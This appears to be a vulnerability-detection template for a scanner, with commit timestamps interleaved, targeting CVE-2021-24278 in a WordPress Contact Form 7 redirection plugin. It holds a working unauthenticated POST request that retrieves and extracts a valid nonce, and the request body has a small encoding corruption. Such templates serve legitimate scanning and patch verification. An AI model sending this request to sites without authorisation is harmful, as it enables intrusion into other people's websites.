2021-11-26 23:32:48 +00:00
id : CVE-2021-24278
info :
name : Redirection for Contact Form 7 < 2.3.4 - Unauthenticated Arbitrary Nonce Generation
author : 2rs3c
severity : high
2021-11-27 04:34:24 +00:00
description : In the Redirection for Contact Form 7 WordPress plugin before 2.3.4, unauthenticated users can use the wpcf7r_get_nonce AJAX action to retrieve a valid nonce for any WordPress action/function.
2021-11-26 23:32:48 +00:00
reference :
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24278
- https://wpscan.com/vulnerability/99f30604-d62b-4e30-afcd-b482f8d66413
- https://www.wordfence.com/blog/2021/04/severe-vulnerabilities-patched-in-redirection-for-contact-form-7-plugin/
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2021-24278
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,wordpress,wp-plugin
2021-11-26 23:32:48 +00:00
requests :
- method : POST
path :
- "{{BaseURL}}/wp-admin/admin-ajax.php"
headers :
Content-Type : application/x-www-form-urlencoded
body : "action=wpcf7r_get_nonce¶m=wp_rest"
matchers-condition : and
matchers :
- type : status
status :
- 200
2021-11-27 04:34:24 +00:00
- type : regex
2021-11-26 23:32:48 +00:00
part : body
2021-11-27 04:34:24 +00:00
regex :
- '"success":true'
- '"nonce":"[a-f0-9]+"'
condition : and
2021-11-26 23:32:48 +00:00
extractors :
- type : regex
part : body
regex :
2021-11-27 04:34:24 +00:00
- '"nonce":"[a-f0-9]+"'